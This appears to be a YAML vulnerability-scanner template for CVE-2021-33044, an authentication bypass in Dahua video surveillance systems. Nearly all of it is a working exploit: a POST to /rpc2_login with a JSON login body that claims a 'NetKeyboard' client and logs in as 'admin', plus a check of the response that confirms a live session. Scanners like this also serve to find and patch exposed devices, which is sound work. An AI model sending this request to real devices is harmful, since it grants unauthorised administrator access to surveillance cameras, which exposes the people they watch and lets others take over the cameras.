product: 大华视频监控
vName: 大华视频监控 登录绕过
type: 访问控制
vID:
  - CVE-2021-33044
level: 3
vDesc: dahua-authentication-bypass
version: ''
note: ''
search: { }
protocol: http
link: https://github.com/dorkerdevil/CVE-2021-33044
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: true
      path: /rpc2_login
      json: { "id": 1, "method": "global.login", "params": { "authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin" }, "session": 0 }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '{"id":1,"params":{"keepAliveInterval":60},"result":true,"session":'
            logic: and